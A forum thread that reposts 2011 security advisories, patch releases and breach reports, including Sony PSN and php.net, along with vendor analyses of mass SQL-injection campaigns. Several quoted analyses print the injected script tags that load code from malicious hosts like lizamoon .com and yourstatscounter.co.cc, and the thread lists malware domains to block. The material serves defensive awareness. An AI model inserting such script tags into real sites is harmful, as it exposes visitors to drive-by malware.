Old Alerts

Apple multiple vulns - updates released

FYI...

Apple Safari multiple vulns - v5.0.4 released
- http://secunia.com/advisories/43696/
Release Date: 2011-03-10
Criticality level: Highly critical
Impact: Cross Site Scripting, Spoofing, Exposure of sensitive information, System access
Where: From remote
Solution: Update to version 5.0.4.
Original Advisory: http://support.apple.com/kb/HT4566
- http://techblog.avira.com/2011/03/10/the-next-browser-update-safari/en/
"... fixes at least 62 vulnerabilities..."
- http://www.securitytracker.com/id/1025183
Mar 9 2011
___

Apple iOS multiple vulns - v4.3 released
- http://secunia.com/advisories/43698/
Release Date: 2011-03-10
Criticality level: Highly critical
Impact: Cross Site Scripting, Spoofing, Exposure of sensitive information, DoS,
System access
Where: From remote
Operating System: Apple iOS for iPad 4.x, Apple iPhone OS (iOS) 4.x, Apple iPhone OS (iOS) for iPod touch 4.x
... The vulnerabilities are reported in versions prior to 4.3.
Solution: Update to version 4.3.
Original Advisory: http://support.apple.com/kb/HT4564
- http://www.securitytracker.com/id/1025182
Mar 9 2011
___

Apple TV v4.2
- http://secunia.com/advisories/43697/
Release Date: 2011-03-10
Criticality level: Highly critical
Impact: Exposure of sensitive information, DoS, System access
Where: From remote
Solution: Update to Apple TV version 4.2.
Original Advisory: http://support.apple.com/kb/HT4565

:fear::fear:
 
Last edited:
Google Chrome v10.0.648.133 released

FYI...

Google Chrome v10.0.648.133 released
- http://secunia.com/advisories/43748/
Release Date: 2011-03-14
Criticality level: Highly critical
Impact: System access
Where: From remote
Solution: Update to version 10.0.648.133...
Original Advisory:
http://googlechromereleases.blogspot.com/2011/03/stable-and-beta-channel-updates.html

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1290
Last revised: 03/31/2011
CVSS v2 Base Score: 10.0 (HIGH)

:fear::fear:
 
Last edited:
Motivation - Demonstrated ... at CanSecWest 2011

FYI...

IE:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1346
Published: 03/11/2011
CVSS Severity: 10.0 (HIGH)
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1347
Last revised: 03/12/2011
CVSS Severity: 8.8 (HIGH)
Apple:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1344
Published: 03/11/2011
CVSS Severity: 10.0 (HIGH)
BlackBerry:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1290
Last revised: 03/14/2011
CVSS Severity: 10.0 (HIGH)
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1415
Last revised: 03/14/2011
CVSS Severity: 10.0 (HIGH)
___

- http://www.team-cymru.org/News/
"... PWN2OWN shows us the future..."

:fear::fear::fear:
 
Last edited:
Foxit software multiple vulns...

FYI...

Foxit Reader vuln - workaround
- http://secunia.com/advisories/43776/
Release Date: 2011-03-15
Criticality level: Moderately critical
Impact: System access
Where: From remote
Solution Status: Vendor Workaround
Solution: Ensure that "Safe Reading Mode" is enabled.

Foxit Phantom vuln - unpatched
- http://secunia.com/advisories/43625/
Release Date: 2011-03-15
Criticality level: Highly critical
Solution Status: Unpatched
... vulnerability is confirmed in version 2.2.4.0225. Other versions may also be affected.
Solution: Do not open PDF files from untrusted sources.

:fear::fear:
 
GoogleChrome v10.0.648.151 released

FYI...

GoogleChrome v10.0.648.151 released
- http://googlechromereleases.blogspot.com/search/label/Stable updates
March 17, 2011 - "... updated to 10.0.648.151 for Windows, Mac, Linux and Chrome Frame. This release blacklists a small number of HTTPS certificates*..."
- http://googlechromereleases.blogspot.com/2011/03/stable-and-beta-channel-updates_15.html
March 15, 2011 - "The Chrome Stable and Beta channels have been updated to 10.0.648.134 for Windows, Mac, Linux and Chrome Frame. This release contains an updated version of the Adobe Flash player..."

* http://isc.sans.edu/diary.html?storyid=10603
Last Updated: 2011-03-23 18:11:20 UTC

- http://techblog.avira.com/2011/03/17/google-faster-than-adobe/en/
March 17, 2011 - "... new Chrome version 10.0.648.134 for Windows, Mac and Linux. It only includes a new version of the Flash Player where the recently found zero day vulnerability is already fixed..."

- http://secunia.com/advisories/43757/
Last Update: 2011-03-16 ...
Solution: Update to version 10.0.648.134.
___

- http://www.us-cert.gov/current/#google_releases_chrome_10_02
March 17, 2011

:fear:
 
Last edited:
php.net hacked ...

FYI...

php.net security notice
- http://www.php.net/archive/2011.php#id2011-03-19-2
19-Mar-2011 - "The wiki.php.net box was compromised and the attackers were able to collect wiki account credentials. No other machines in the php.net infrastructure appear to have been affected. Our biggest concern is, of course, the integrity of our source code. We did an extensive code audit and looked at every commit since 5.3.5 to make sure that no stolen accounts were used to inject anything malicious. Nothing was found. The compromised machine has been wiped and we are forcing a password change for all svn accounts. We are still investigating the details of the attack which combined a vulnerability in the Wiki software with a Linux root exploit."

- http://www.h-online.com/security/news/item/PHP-developer-wiki-server-hacked-1211874.html
21 March 2011
___

PHP 5.3.6 Released
17-Mar-2011 - "The PHP development team would like to announce the immediate availability of PHP 5.3.6. This release focuses on improving the stability of the PHP 5.3.x branch with over 60 bug fixes, some of which are security related..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1153
Last revised: 03/22/2011
CVSS v2 Base Score: 7.5 (HIGH) / "... in PHP 5.3.5 and earlier..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1092
Last revised: 03/22/2011
CVSS v2 Base Score: 7.5 (HIGH) / "... before 5.3.6..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1148
Last revised: 03/21/2011
CVSS v2 Base Score: 7.5 (HIGH) / "... in PHP 5.3.6 and earlier..."
> http://xforce.iss.net/xforce/xfdb/66080
"High Risk... No remedy available as of March 22, 2011..."

:fear::mad::fear:
 
Last edited:
Apple critical update released ...

- http://secunia.com/advisories/43814/
Release Date: 2011-03-22
Criticality level: Highly critical
Impact: Security Bypass, Cross Site Scripting, Spoofing, Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS, System access
Where: From remote
Solution: Update to version 10.6.7 or apply Security Update 2011-001.
Original Advisory: Apple:
http://support.apple.com/kb/HT4581
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=898
"... used by Apple's mobile devices, including the iPod Touch, iPhone, and iPad... could allow an attacker to execute arbitrary code with the privileges of the current user..."
___

- http://www.us-cert.gov/current/#apple_releases_security_updates4
March 22, 2011

:fear::fear:
 
Last edited:
Google Chrome v10.0.648.204 released

FYI...

Google Chrome v10.0.648.204 released
- http://secunia.com/advisories/43859/
Release Date: 2011-03-25
Criticality level: Highly critical
Impact: System access
Where: From remote
CVE Reference(s): CVE-2011-1291, CVE-2011-1292, CVE-2011-1293, CVE-2011-1294, CVE-2011-1295, CVE-2011-1296 ...
Solution: Update to version 10.0.648.204.
Original Advisory:
http://googlechromereleases.blogspot.com/2011/03/stable-channel-update.html
___

When clicking on the tool symbol and choosing the 'About Google Chrome' menu entry, the version check should show that Chrome is already on the current release – or offer to download and install the update.

:fear::fear:
 
Last edited:
MySQL and Sun hacked ...

FYI...

MySQL and Sun hacked...
- http://nakedsecurity.sophos.com/2011/03/27/mysql-com-and-sun-hacked-through-sql-injection/
March 27, 2011 - "Proving that no website is ever truly secure, it is being reported that MySQL.com has succumbed to an SQL injection attack. It was first disclosed to the Full Disclosure mailing list*... Several accounts had passwords like "qa". The irony is that they weren't compromised by means of their ridiculously simple passwords, but rather flaws in the implementation of their site... MySQL's parent company Sun/Oracle has also been attacked**. Both tables and emails were dumped from their databases, but no passwords. It does not appear to be a vulnerability in the MySQL software, but rather flaws in the implementation of their websites... It was noted on Twitter that mysql .com is also subject to an XSS (cross-site scripting) vulnerability that was reported in January 2011 and has not been remedied."
* http://seclists.org/fulldisclosure/2011/Mar/309?utm_source=twitterfeed&utm_medium=twitter

** http://tinkode27.baywords.com/sun-com-sun-mycrosystems-vulnerable-sql-injection/

- http://blog.sucuri.net/2011/03/mysql-com-compromised.html
March 27, 2011 - "... If you have an account on MySQL.com, we recommend changing your passwords ASAP..."

- https://www.computerworld.com/s/article/9215249/MySQL_Web_site_falls_victim_to_SQL_injection_attack
March 28, 2011

:fear::mad::fear:
 
Last edited:
28,000 URLs whacked...

FYI...

SQL mass injection hits over 28,000 URLs including iTunes
- http://community.websense.com/blogs...ss-injection-28000-urls-including-itunes.aspx
29 Mar 2011 - "Websense... has identified a new malicious mass-injection campaign that we call LizaMoon...
The LizaMoon mass-injection is a SQL injection attack...
< script src=hxxp ://lizamoon .com/ur.php></script >
According to a Google Search, over 28,000 URLs have been compromised. This includes several iTunes URLs... The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple. The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site:
hxxp ://defender-uqko .in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet. The domain lizamoon .com was registered three days ago with clearly fake information... We'll keep monitoring this mass-injection attack and provide updated information as it's available."
(Screenshots and more detail available at the Websense URL above.)
___

urgent block: lizamoon .com and defender-uqko .in
- http://www.malwaredomains.com/wordpress/?p=1728
March 30th, 2011 - "Websense... is reporting a mass sql injection attack of over 28000 sites... We’ll be adding this site (and defender-uqko .in) on tonight’s update, but you shouldn’t wait... add these sites to your blocklists ASAP."

:mad::mad::mad:
 
Last edited:
380,000 URLs whacked...

FYI...

380,000 226,000 28000 URLs whacked...
- http://community.websense.com/blogs...ss-injection-28000-urls-including-itunes.aspx
2011-03-31 01:58
"UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.
UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon .com."

:fear::fear::fear:
 
Last edited:
LizaMoon mass-injection - updated...

FYI...

- http://blog.sucuri.net/2011/04/lizamoon-mass-sql-injection-ur-php-updates.html
April 4, 2011 - "... good way to check if your site is infected, is by using our malware scanner*. If you see IIS:4 as the malware code, you know what happened..."
* http://sitecheck.sucuri.net/scanner/
___

Update on LizaMoon mass-injection...
- http://community.websense.com/blogs.../03/31/update-on-lizamoon-mass-injection.aspx
31 Mar 2011 - "The LizaMoon mass-injection campaign is still ongoing and more than 500,000 URLs have a script link to lizamoon .com according to Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a Google Search reveals over 1,500,000 URLs that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down... All the code does is a redirect to a rogue AV site..."
(Screenshots and more detail at the Websense URL above.)

- http://isc.sans.edu/diary.html?storyid=10642
Last Updated: 2011-04-01 21:49:17 UTC - "... There doesn't seem to be anything particularly new about the infection mechanism (aside of the scope of its success) and the injection itself only inserts a random snippet of HTML to redirect victims to a rogue AV site that tells the user they are infected. One of the domains implicated in this attack was registered in October and showed up on the radar in December, so it appears the preparation of this attack has taken some time... Infected sites tend to use the same URL structure including a file "ur.php". It appears this is only affecting sites using Microsoft SQL Server 2003/2005. Defense against your sites getting infected is the standard things we ought to be doing anyway in regards to SQL injection (i.e. filter input for control characters, whitelist if possible, blacklist if not). Webserver administrators should also be checking for sudden appearance of files in their httpdocs directory..."
- http://isc.sans.edu/tag.html?tag=sql injection

- http://www.theregister.co.uk/2011/03/31/lizamoon_mass_injection_attack/
"... The count only looks at unique URLs, not infected hosts, a more meaningful metric. Even so the assault still counts as among the most widespread mass-injection attacks on record..."

- http://blog.trendmicro.com/lizamoon-etc-sql-injection-attack-still-on-going/
March 31, 2011 - "... monitoring a still-ongoing mass compromise involving a great number of websites. The compromised sites have been injected with a malicious script that triggers redirects to certain URLs that lead to malware such as FAKEAV... We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others..."

- http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html
March 31, 2011 - "... the used domains are all responding to the same IPs, including the portfolios of scareware domains, which the cybercriminals naturally rotate on a periodic basis... Upon successful redirection, the campaign attempts to load the scareware domains..."
(More detail at the ddanchev.blogspot URL above.)
- http://www.virustotal.com/file-scan...e8229bfc367626961f76c03f75dcd7e95c-1301586582
File name: freesystemscan.exe
Submission date: 2011-03-31 15:49:42 (UTC)
Current status: finished
Result: 9/41 (22.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...e8229bfc367626961f76c03f75dcd7e95c-1301722562
File name: a.exe
Submission date: 2011-04-02 05:36:02 (UTC)
Result: 24/42 (57.1%)
___

Lizamoon SQL Injection: 7 Months Old and Counting
- http://blog.scansafe.com/journal/2011/4/1/lizamoon-sql-injection-7-months-old-and-counting.html
April 1, 2011 - "...part of a continuous SQLi attack that spans the past seven months... 40+ malware domains... have been used in the ongoing injection attacks..."

- http://nakedsecurity.sophos.com/2011/04/01/lizamoon-sql-injection/
April 1, 2011

:fear::mad::fear:
 
Last edited:
SQL injection - more...

FYI...

Database Injection on Joomla Websites...
- http://blog.sucuri.net/2011/04/database-injection-on-joomla-sites-yourstatscounter-cz-cc.html
April 6, 2011 - "It seems that a good amount of Joomla sites are being infected with malware from the infamous “.cc” domains. All of the hacked sites have the malicious code injected directly in to their databases (SQL injection), via an unknown source (probably a vulnerable extension, but we are still researching the entry point). This is what is being added to the infected sites (at the top of every post in the jos_content table):
< script type="text/javascript" src="http://yourstatscounter.co.cc/statscounter307.js" >< /script >
There are many others domains being used in this attack, including:
http ://faststatscounter.co.cc/statscounter01935 .js
http ://yourstatscounter.cz.cc/statscounter301 .js
http ://yourstatscounter.co.cc/statscounter307 .js
http ://easystatscounter.co.cc/statscounter12 .js
http ://supergoogleanalytics.co.cc/
Note that those are different from the Lizamoon SQL injection of a few days ago. The Lizamoon was targeting IIS/ASP.net sites, while this one seems to be targeted only to Joomla sites.... site might be hacked(?), check it using our malware scanner*..."
* http://sitecheck.sucuri.net/

- http://google.com/safebrowsing/diagnostic?site=yourstatscounter.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=faststatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=yourstatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=easystatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=supergoogleanalytics.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
___

Thousands of osCommerce sites infected...
- http://blog.sucuri.net/2011/04/continuing-attacks-against-oscommerce-khcol-com.html
April 5, 2011 - "... we are seeing thousands of osCommerce sites infected with a malware pointing to http ://khcol .com...
> Update 1: Google already blacklisted more than 1 thousand sites because of this malware. We have identified a lot more already, so this number should grow very soon...
> Update 2: Other domains being used in this attack: solomon-xl .cz.cc, thescannerantiv .com, searchableantiv .com, www1 .checker-network-hard .cz.cc and many others."

- http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=khcol.com/
"... last time suspicious content was found on this site was on 2011-04-08... Malicious software includes 2861 scripting exploit(s), 64 trojan(s), 1 exploit(s)... Over the past 90 days, khcolm .com appeared to function as an intermediary for the infection of 1149 site(s)... This site was hosted on 1 network(s) including AS17408..."
- http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:17408
"... over the past 90 days, 50 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... The last time Google tested a site on this network was on 2011-04-07, and the last time suspicious content was found was on 2011-04-07... we found 5 site(s) on this network... that appeared to function as intermediaries for the infection of 1152 other site(s)..."

- http://google.com/safebrowsing/diagnostic?site=solomon-xl.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=thescannerantiv.com/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=searchableantiv.com/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=checker-network-hard.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."

:mad:
 
Last edited:
WordPress sites hacked - link injection...

FYI...

WordPress sites hacked - link injection – Blackhat SEO SPAM
[1] - http://blog.sucuri.net/2011/04/link-injection-on-hacked-wordpress-sites-blackhat-seo-spam.html
April 11, 2011 - "For the last few months we’ve been tracking and helping webmasters affected by a very large blackhat SEO spam campaign initiated by basicpills .com and many other domains[1] located at 212.117.161.190. They infected thousands of WordPress sites and injected spam links directly in their databases (the wp-post table)... For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner*. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately and checking the permissions of your wp-config.php file..."
* http://sitecheck.sucuri.net/

> http://centralops.net/co/DomainDossier.aspx
** canonical name: basicpills .com.
addresses: 212.117.161.190...
http://google.com/safebrowsing/diagnostic?site=basicpills.com/
... This site was hosted on 1 network(s) including AS5577 (ROOT).

** 212.117.161.190
country: LU
origin: AS5577
> http://www.google.com/safebrowsing/diagnostic?site=AS:5577
"Of the 1939 site(s) we tested on this network over the past 90 days, 98 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... Over the past 90 days, we found 64 site(s) on this network... that appeared to function as intermediaries for the infection of 139 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 316 site(s)... that infected 4190 other site(s)..."
___

- http://en.blog.wordpress.com/2011/04/13/security/
April 13th, 2011

:mad:
 
Last edited:
Apple Safari v5.0.5 released

FYI...

Apple Safari v5.0.5 released...
- http://secunia.com/advisories/44151/
Release Date: 2011-04-15
Criticality level: Highly critical ...
CVE Reference(s):
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1290
CVSS v2 Base Score: 10.0 (HIGH)
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1344
CVSS v2 Base Score: 10.0 (HIGH)
Solution: Update to version 5.0.5.
Original Advisory: Apple:
http://support.apple.com/kb/HT4596

- http://www.us-cert.gov/current/#apple_releases_safari_5_05
April 15, 2011

.
 
Last edited:
Chrome v10.0.648.205 released

FYI...

Google Chrome v10.0.648.205 released
- http://googlechromereleases.blogspot.com/2011/04/stable-channel-update.html
April 14, 2011 - "The Chrome Stable channel has been updated to 10.0.648.205 for Windows, Mac, Linux and Chrome Frame. This release contains a new version of Adobe Flash..."

- http://www.securitytracker.com/id/1025377
Date: Apr 15 2011
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1300
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1301
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1302
Last revised: 04/18/2011
[ALL] ... CVSS v2 Base Score: 10.0 (HIGH)

- http://www.us-cert.gov/current/#google_releases_chrome_10_04
Apr 15 2011

:fear:
 
Last edited:
Mass Injections leading to g01pack exploit kit

FYI...

Mass Injections Leading to g01pack Exploit Kit
- http://community.websense.com/blogs...njections-Leading-to-g01pack-Exploit-Kit.aspx
19 Apr 2011 - "... detected a new injection attack which leads to an obscure Web attack kit. The injection has three phases... The first phase of the attack is a typical vector** for exploit kits to drive traffic to their sites: script injections. Script HTML code is put on legitimate Web sites meant to drive traffic to the attack kits without the victim's knowledge. In this case, legitimate sites are injected with malicious JavaScript... In the second phase, this script injection then pulls obfuscated content from another site. The obfuscated content creates an iframe that is used to pull content from the exploit kit site... The exploit kit can basically be described as a drive-by download site used in the third and final phase of this attack. Its intent is to scan, attack, and run malicious code on the visitor's computer. If -one- of the exploit kit's Web attacks is successful, it could put malware on a victim's computer that is meant to remotely control the computer. The binary that this kit tries to run on target computers has low detection* as a Rogue AV installation. As is typical, the exploit kit's Web attack code is obfuscated... We were able to access the admin panel and confirm that this site is hosting an installation of g01pack malware tool..."
* http://www.virustotal.com/file-scan...88a65e4793c27fda8f869f6fded35756a1-1303197157
File name: JwWeagugDQKT.exe
Submission date: 2011-04-19 07:12:37 (UTC)
Result: 15/42 (35.7%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...88a65e4793c27fda8f869f6fded35756a1-1303729645
File name: JwWeagugDQKT.exe
Submission date: 2011-04-25 11:07:25 (UTC)
Result: 30/40 (75.0%)

** http://community.websense.com/blogs...ss-injection-28000-urls-including-itunes.aspx
29 Mar 2011

:mad:
 
Last edited:
Mass infections – globalpoweringgathering .com

FYI...

Mass infections – globalpoweringgathering .com
- http://blog.sucuri.net/2011/04/mass-infections-globalpoweringgathering-com.html
April 25, 2011 - "We first detected malware from globalpoweringgathering .com almost a month ago, and posted on our blog* about it. But just on the last few days, we started to see a big increase in the number of sites infected with it. We were able to catalog a find almost 3 thousand sites with this malware and Google lists almost 2 thousand sites in their safe browsing page** (and it is growing each day – just yesterday it was less than 1 thousand)... On our original post, we explained about this malware, which was injecting an encoded javascript directly in the WordPress database. However, on the latest infections, we are seeing the following code added directly to the HTML or PHP files (with no obfuscation):
< script src="http ://globalpoweringgathering .com/in.php?n=15"..
With some variations, with just a number changing:
http ://globalpoweringgathering .com/in.php?n=15
http ://globalpoweringgathering .com/in.php?n=25
http ://globalpoweringgathering .com/in.php?n=2
http ://globalpoweringgathering .com/in.php?n=9
Note that this is a very similar from the “Hilary Kneber” malware distributed by these domains (hosted on the same IP addresses):
globalpoweringgathering .com
lessthenaminutehandle .com
lessthenaseconddeal .com
welcometotheglobalisnet .com ...
We are seeing multiple causes. The most common was related the usage of old versions of web applications (like WordPress, Joomla, etc). However, we are also seeing HTML-only sites hacked that got compromised via FTP due to stolen passwords. So make sure your sites are updated and change your passwords (making sure to use a strong password, that your desktop is not compromised, etc)..."
* http://blog.sucuri.net/2011/04/database-injection-lessthenaminutehandle-com-and-more-updates.html

** http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=globalpoweringgathering.com/
"... Malicious software includes 37 scripting exploit(s)... It infected 1919 domain(s)..."
___

- http://blog.sucuri.net/2011/04/jquery4html-co-cc-malware-update-fake-av-redirections.html
April 26, 2011 - "Today we started to see a lot of sites infected with an iframe malware from jquery4html .co.cc (yes, always the .co.cc)... when we tried to access this site to identify what was going on, we were greeted with a page from the .co.cc registrar saying that the domain was available:
The domain jquery4html.co.cc is available Continue to registration >>
If you want to build a site at this address, please visit us at www .co.cc
We found that very strange and tried to register the domain to see what was going on (their registration is free), but when we were close to completing the registration they said that the domain was not available anymore... Too bad.
A few hours later, that domain was already loading additional malicious iframes from diagnostic-scanner-xp-protection .com, hilitsors .cz.cc and many other intermediaries... There are many other sites being used as intermediaries (and just by looking at the domain names you can guess that they try to push the infamous Fake AV), including hundreds of .com..."
(More detail at the blog.sucuri.net URL above.)

:mad::mad:
 
Last edited:
Sony PSN hack ...

FYI...

PSN hack: Personal data of millions of customers stolen
- http://www.h-online.com/security/ne...-of-millions-of-customers-stolen-1233209.html
27 April 2011 - "... Sony says that 77 million customers in 59 countries, including about 32 million in Europe, use the PlayStation Network... Even if no credit card information has been stolen, effects on customers could be very unpleasant. Experts think that fraudulent activities where criminals attempt to make clever use of the harvested personal data will be particularly likely. Sony has also recommended that users change their passwords when the PSN and Qriocity come back online – however, no concrete date and time have been mentioned. Customers who use their PSN or Qriocity user name or password for other services or accounts should also change their passwords for these accounts as soon as possible."
___

- http://www.theregister.co.uk/2011/04/26/sony_playstation_network_security_breach/
26 April 2011 21:53 GMT
___

Sony PSN user info compromised...
- http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
Apr 26, 2011 - "... We are currently working to send a similar message to the one below via email to -all- of our registered account holders regarding a compromise of personal information as a result of an illegal intrusion on our systems...

'... certain PlayStation Network and Qriocity service user account information was compromised in connection with an illegal and unauthorized intrusion into our network... we believe that an unauthorized person has obtained the following information that you provided: name, address (city, state, zip), country, email address, birthdate, PlayStation Network/Qriocity password and login, and handle/PSN online ID. It is also possible that your profile data, including purchase history and billing address (city, state, zip), and your PlayStation Network/Qriocity password security answers may have been obtained. If you have authorized a sub-account for your dependent, the same data with respect to your dependent may have been obtained. While there is no evidence at this time that credit card data was taken, we cannot rule out the possibility. If you have provided your credit card data through PlayStation Network or Qriocity, out of an abundance of caution we are advising you that your credit card number (excluding security code) and expiration date may have been obtained.
> For your security, we encourage you to be especially aware of email, telephone, and postal mail scams that ask for personal or sensitive information. Sony will not contact you in any way, including by email, asking for your credit card number, social security number or other personally identifiable information. If you are asked for this information, you can be confident Sony is not the entity asking. When the PlayStation Network and Qriocity services are fully restored, we strongly recommend that you log on and change your password. Additionally, if you use your PlayStation Network or Qriocity user name or password for other unrelated services or accounts, we strongly recommend that you change them, as well.
> To protect against possible identity theft or other financial loss, we encourage you to remain vigilant, to review your account statements and to monitor your credit reports...' ..."
(More detail at the URL above.)

- http://us.playstation.com/news/consumeralerts/#non-us
> News > Consumer Alerts

- http://blog.us.playstation.com/2011/04/26/clarifying-a-few-psn-points/
___

Sony PSN user credit card info protected by encryption
User passwords? Not so much
- http://www.theregister.co.uk/2011/04/28/sony_playstation_network_credit_cards/
28 April 2011 - "All credit card information stored on Sony's PlayStation Network was encrypted, the company said one day after warning users their user names, passwords, birth dates and home addresses were stolen in a security breach.
“The entire credit card table was encrypted and we have no evidence that credit card data was taken,” Sony representatives wrote in the update*, which was posted late on Wednesday. “The personal data table, which is a separate data set, was not encrypted, but was, of course, behind a very sophisticated security system that was breached in a malicious attack”... They said they expect some online PlayStation services to resume this Tuesday..."
* http://blog.us.playstation.com/2011/04/27/qa-1-for-playstation-network-and-qriocity-services/
___

Sony sued over PSN hack
- http://www.informationweek.com/news/security/attacks/229402362?printer_friendly=this-page
27 April 2011

:sad::fear::mad:
 
Last edited:
You must log in or register to reply here.
Back
Top